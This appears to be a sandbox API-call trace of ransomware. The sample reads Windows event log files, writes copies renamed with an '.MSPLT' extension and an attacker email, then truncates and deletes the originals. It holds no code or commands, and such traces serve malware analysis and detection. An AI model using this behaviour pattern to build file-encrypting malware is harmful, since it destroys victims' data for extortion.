[0288.601] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0288.601] lstrlenW (lpString=".jpg") returned 4 [0288.601] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.601] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0288.601] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0288.601] lstrlenW (lpString=".doc") returned 4 [0288.601] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.601] lstrlenW (lpString=".docx") returned 5 [0288.601] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.602] lstrlenW (lpString=".pdf") returned 4 [0288.602] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.602] lstrlenW (lpString=".xls") returned 4 [0288.602] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.602] lstrlenW (lpString=".xlsx") returned 5 [0288.602] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.602] lstrlenW (lpString=".ppt") returned 4 [0288.602] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.602] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0288.602] lstrlenW (lpString=".zip") returned 4 [0288.602] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.602] lstrlenW (lpString=".rar") returned 4 [0288.602] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.602] lstrlenW (lpString=".bz2") returned 4 [0288.602] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.602] lstrlenW (lpString=".7z") returned 3 [0288.602] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.602] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0288.602] lstrlenW (lpString=".dbf") returned 4 [0288.602] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.602] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0288.602] lstrlenW (lpString=".1cd") returned 4 [0288.602] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0288.603] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0288.603] lstrlenW (lpString=".jpg") returned 4 [0288.603] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.603] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0288.603] lstrlenW (lpString="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 63 [0288.603] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0288.603] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=69632) returned 1 [0288.604] CloseHandle (hObject=0x440) returned 1 [0288.604] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx")) returned 0x20 [0288.604] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0288.604] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0288.604] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.604] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.604] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0288.606] GetLastError () returned 0x0 [0288.606] ReadFile (in: hFile=0x440, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x11000, lpOverlapped=0x0) returned 1 [0288.616] WriteFile (in: hFile=0x3d0, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x11010, lpOverlapped=0x0) returned 1 [0288.976] ReadFile (in: hFile=0x440, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0288.976] WriteFile (in: hFile=0x3d0, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x152, lpOverlapped=0x0) returned 1 [0288.976] SetEndOfFile (hFile=0x3d0) returned 1 [0288.977] CloseHandle (hObject=0x3d0) returned 1 [0288.985] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.985] SetEndOfFile (hFile=0x440) returned 1 [0288.988] CloseHandle (hObject=0x440) returned 1 [0288.988] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0288.988] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx")) returned 1 [0288.989] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0288.989] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0288.989] lstrlenW (lpString=".doc") returned 4 [0288.989] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.989] lstrlenW (lpString=".docx") returned 5 [0288.989] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.989] lstrlenW (lpString=".pdf") returned 4 [0288.989] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.989] lstrlenW (lpString=".xls") returned 4 [0288.989] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.989] lstrlenW (lpString=".xlsx") returned 5 [0288.989] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.989] lstrlenW (lpString=".ppt") returned 4 [0288.989] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.989] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0288.990] lstrlenW (lpString=".zip") returned 4 [0288.990] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.990] lstrlenW (lpString=".rar") returned 4 [0288.990] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.990] lstrlenW (lpString=".bz2") returned 4 [0288.990] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.990] lstrlenW (lpString=".7z") returned 3 [0288.990] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.990] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0288.990] lstrlenW (lpString=".dbf") returned 4 [0288.990] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.990] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0288.990] lstrlenW (lpString=".1cd") returned 4 [0288.990] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0288.990] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0288.990] lstrlenW (lpString=".jpg") returned 4 [0288.990] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.990] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0288.990] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0288.991] lstrlenW (lpString=".doc") returned 4 [0288.991] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.991] lstrlenW (lpString=".docx") returned 5 [0288.991] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.991] lstrlenW (lpString=".pdf") returned 4 [0288.991] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.991] lstrlenW (lpString=".xls") returned 4 [0288.991] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.991] lstrlenW (lpString=".xlsx") returned 5 [0288.991] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.991] lstrlenW (lpString=".ppt") returned 4 [0288.991] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.991] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0288.991] lstrlenW (lpString=".zip") returned 4 [0288.991] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.991] lstrlenW (lpString=".rar") returned 4 [0288.991] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.991] lstrlenW (lpString=".bz2") returned 4 [0288.991] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.991] lstrlenW (lpString=".7z") returned 3 [0288.992] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.992] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0288.992] lstrlenW (lpString=".dbf") returned 4 [0288.992] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.992] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0288.992] lstrlenW (lpString=".1cd") returned 4 [0288.992] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0288.992] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0288.992] lstrlenW (lpString=".jpg") returned 4 [0288.992] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.992] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0288.992] lstrlenW (lpString="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 48 [0288.992] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0288.994] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=69632) returned 1 [0288.994] CloseHandle (hObject=0x440) returned 1 [0288.994] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx")) returned 0x20 [0288.994] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0288.994] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0288.995] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.995] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.995] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0288.995] GetLastError () returned 0x0 [0288.995] ReadFile (in: hFile=0x440, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x11000, lpOverlapped=0x0) returned 1 [0289.001] WriteFile (in: hFile=0x3d0, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x11010, lpOverlapped=0x0) returned 1 [0289.006] ReadFile (in: hFile=0x440, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0289.006] WriteFile (in: hFile=0x3d0, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x134, lpOverlapped=0x0) returned 1 [0289.006] SetEndOfFile (hFile=0x3d0) returned 1 [0289.006] CloseHandle (hObject=0x3d0) returned 1 [0289.124] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0289.124] SetEndOfFile (hFile=0x440) returned 1 [0289.129] CloseHandle (hObject=0x440) returned 1 [0289.130] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0289.130] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx")) returned 1 [0289.131] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0289.131] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0289.131] lstrlenW (lpString=".doc") returned 4 [0289.131] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0289.131] lstrlenW (lpString=".docx") returned 5 [0289.131] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0289.131] lstrlenW (lpString=".pdf") returned 4 [0289.131] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0289.131] lstrlenW (lpString=".xls") returned 4 [0289.131] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0289.131] lstrlenW (lpString=".xlsx") returned 5 [0289.133] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0289.133] lstrlenW (lpString=".ppt") returned 4 [0289.133] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0289.133] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0289.133] lstrlenW (lpString=".zip") returned 4 [0289.133] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0289.133] lstrlenW (lpString=".rar") returned 4 [0289.133] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0289.133] lstrlenW (lpString=".bz2") returned 4 [0289.134] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0289.134] lstrlenW (lpString=".7z") returned 3 [0289.134] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0289.134] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0289.134] lstrlenW (lpString=".dbf") returned 4 [0289.134] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0289.134] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0289.134] lstrlenW (lpString=".1cd") returned 4 [0289.134] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0289.134] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0289.134] lstrlenW (lpString=".jpg") returned 4 [0289.134] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0289.135] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0289.135] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0289.135] lstrlenW (lpString=".doc") returned 4 [0289.136] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0289.136] lstrlenW (lpString=".docx") returned 5 [0289.136] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0289.136] lstrlenW (lpString=".pdf") returned 4 [0289.136] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0289.136] lstrlenW (lpString=".xls") returned 4 [0289.136] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0289.136] lstrlenW (lpString=".xlsx") returned 5 [0289.136] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0289.136] lstrlenW (lpString=".ppt") returned 4 [0289.136] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0289.136] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0289.137] lstrlenW (lpString=".zip") returned 4 [0289.137] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0289.137] lstrlenW (lpString=".rar") returned 4 [0289.137] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0289.137] lstrlenW (lpString=".bz2") returned 4 [0289.137] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0289.137] lstrlenW (lpString=".7z") returned 3 [0289.137] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0289.137] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0289.137] lstrlenW (lpString=".dbf") returned 4 [0289.137] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0289.137] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0289.137] lstrlenW (lpString=".1cd") returned 4 [0289.138] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0289.138] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0289.138] lstrlenW (lpString=".jpg") returned 4 [0289.138] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0289.138] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0289.138] lstrlenW (lpString="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 78 [0289.138] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0289.139] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=1052672) returned 1 [0289.139] CloseHandle (hObject=0x440) returned 1 [0289.139] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx")) returned 0x20 [0289.140] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0289.140] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0289.140] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0289.140] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0289.140] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0289.141] GetLastError () returned 0x0 [0289.141] ReadFile (in: hFile=0x440, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0xffff0, lpOverlapped=0x0) returned 1 [0289.758] WriteFile (in: hFile=0x3e4, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xffff0, lpOverlapped=0x0) returned 1 [0289.785] ReadFile (in: hFile=0x440, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x1010, lpOverlapped=0x0) returned 1 [0290.194] WriteFile (in: hFile=0x3e4, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x1020, lpOverlapped=0x0) returned 1 [0290.199] ReadFile (in: hFile=0x440, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0290.199] WriteFile (in: hFile=0x3e4, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x170, lpOverlapped=0x0) returned 1 [0290.200] SetEndOfFile (hFile=0x3e4) returned 1 [0290.200] CloseHandle (hObject=0x3e4) returned 1 [0290.881] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0290.881] SetEndOfFile (hFile=0x440) returned 1 [0291.328] CloseHandle (hObject=0x440) returned 1 [0291.344] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0291.344] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx")) returned 1 [0291.345] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0291.345] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0291.345] lstrlenW (lpString=".doc") returned 4 [0291.345] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0291.345] lstrlenW (lpString=".docx") returned 5 [0291.345] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0291.345] lstrlenW (lpString=".pdf") returned 4 [0291.345] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0291.345] lstrlenW (lpString=".xls") returned 4 [0291.345] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0291.345] lstrlenW (lpString=".xlsx") returned 5 [0291.345] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0291.345] lstrlenW (lpString=".ppt") returned 4 [0291.345] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0291.345] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0291.345] lstrlenW (lpString=".zip") returned 4 [0291.346] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0291.346] lstrlenW (lpString=".rar") returned 4 [0291.346] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0291.346] lstrlenW (lpString=".bz2") returned 4 [0291.346] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0291.346] lstrlenW (lpString=".7z") returned 3 [0291.346] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0291.346] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0291.346] lstrlenW (lpString=".dbf") returned 4 [0291.346] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0291.346] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0291.346] lstrlenW (lpString=".1cd") returned 4 [0291.346] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0291.346] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0291.346] lstrlenW (lpString=".jpg") returned 4 